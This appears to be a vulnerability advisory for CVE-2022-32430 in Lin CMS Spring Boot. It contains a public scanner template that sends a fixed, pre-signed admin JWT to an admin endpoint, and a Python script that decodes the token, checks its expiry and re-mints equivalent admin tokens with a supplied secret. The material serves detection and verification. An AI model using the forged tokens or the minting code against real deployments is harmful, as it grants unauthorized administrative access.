CVE-2022-32430

Date: 2025-08-01 | Affected software: Lin CMS Spring Boot v0.2.1 | PoC: public

Vulnerability description

An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access backend information and functions within the application. The PoC below does not send credentials issued by the target: it presents a fixed, pre-signed HS256 bearer token to the admin endpoint /cms/admin/group/all and treats a 200 response carrying group data (name, id, level) as confirmation. A server only accepts such a token if it validates the signature with the same secret the token was minted with, or does not validate it at all, so in practice the check tests whether the deployment still runs with a signing key that is not unique to it.

PoC code [public]

id: CVE-2022-32430

info:
  name: CVE-2022-32430
  author: zhizhuo
  severity: high
  verified: true
  description: |-
    An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access backend information and functions within the application.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32430
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32430
  tags: cve,cve2022
  created: 2023/10/30

rules:
  verify:
    request:
      method: GET
      # admin endpoint that returns the group list; a normal deployment
      # requires an authenticated admin session to reach it
      path: /cms/admin/group/all
      headers:
        # Fixed, pre-signed HS256 JWT. Decoded header/payload:
        #   {"typ":"JWT","alg":"HS256"}
        #   {"identity":1,"scope":"lin","type":"access","exp":1753193479}
        # exp 1753193479 is 2025-07-22T14:11:19Z: a target that enforces exp
        # rejects this token after that date, so re-sign it with the target's
        # secret before relying on a negative result.
        Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8
    # 200 plus the group fields (name/id/level) and no HTML page, which rules
    # out a login page or error page that happens to return 200
    expression: response.status == 200 && response.body.bcontains(b'name') && response.body.bcontains(b'id') && response.body.bcontains(b'level') && !response.body.bcontains(b'<html') && !response.body.bcontains(b'<body') && !response.body.bcontains(b'<script')
expression: verify()
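The template above depends entirely on the token in its Authorization header, so before trusting a negative result a practitioner should decode that token, check its exp claim, and be able to re-sign an equivalent one. The following script is an added example, not code from the original page or from the Lin CMS project. It uses only the Python standard library: it decodes the PoC token without verification, reports whether it has expired, mints a replacement HS256 token with the same claim shape, verifies a token against a candidate secret, and ports the template's match expression so a captured response can be checked offline. The signing secret of a real target is not known here; the secret passed to mint_token() and verify_hs256() is an assumption the caller supplies (the "s3cret" value used in the usage is a placeholder).

```python
"""Decode, expiry-check and re-mint the fixed JWT used by the CVE-2022-32430 template.

Added example (stdlib only). The target's real signing secret is NOT known here;
any secret passed in is the caller's assumption.
"""
import base64
import hashlib
import hmac
import json
import time
from typing import Dict, Optional, Tuple

# Constructed input: the exact token from the PoC's Authorization header.
POC_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ."
    "SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8"
)


def _b64url_decode(s: str) -> bytes:
    # JWT segments are base64url without padding; restore padding before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def decode_unverified(token: str) -> Tuple[Dict, Dict]:
    """Return (header, payload) as dicts WITHOUT checking the signature."""
    h, p, _sig = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p))


def is_expired(token: str, now: Optional[float] = None) -> bool:
    """True if the exp claim (seconds since the epoch) is not in the future."""
    _, payload = decode_unverified(token)
    now = time.time() if now is None else now
    return payload.get("exp", 0) <= now


def mint_token(secret: str, identity: int = 1, ttl_seconds: int = 3600,
               now: Optional[float] = None) -> str:
    """Sign a fresh HS256 token with the same header and claim layout as the PoC token."""
    now = int(time.time() if now is None else now)
    header = {"typ": "JWT", "alg": "HS256"}
    payload = {"identity": identity, "scope": "lin", "type": "access", "exp": now + ttl_seconds}
    # Compact JSON (no spaces) in the same key order as the PoC token.
    signing_input = ".".join(
        _b64url_encode(json.dumps(x, separators=(",", ":")).encode()) for x in (header, payload)
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(sig)}"


def verify_hs256(token: str, secret: str) -> bool:
    """True if `secret` reproduces the token's HMAC-SHA256 signature (constant-time compare)."""
    h, p, sig = token.split(".")
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


def template_matches(status: int, body: bytes) -> bool:
    """Python port of the template's `expression`: same checks, same semantics."""
    required = (b"name", b"id", b"level")
    forbidden = (b"<html", b"<body", b"<script")
    return status == 200 and all(r in body for r in required) and not any(f in body for f in forbidden)


if __name__ == "__main__":
    hdr, claims = decode_unverified(POC_TOKEN)
    print("header :", hdr)
    print("claims :", claims)
    print("exp    :", time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(claims["exp"])))
    print("expired:", is_expired(POC_TOKEN))
    # Placeholder secret: replace with the target deployment's actual signing key.
    fresh = mint_token("s3cret", ttl_seconds=600)
    print("re-minted token verifies with same secret:", verify_hs256(fresh, "s3cret"))
```

Decoding the PoC token gives exp = 1753193479, i.e. 2025-07-22T14:11:19Z, which is earlier than this page's date. Against a target that enforces exp, the published template therefore fails even when the deployment is vulnerable; either re-sign with mint_token() using the deployment's secret, or treat a 200 obtained with the stale token as evidence that the server is not checking expiry or the signature at all.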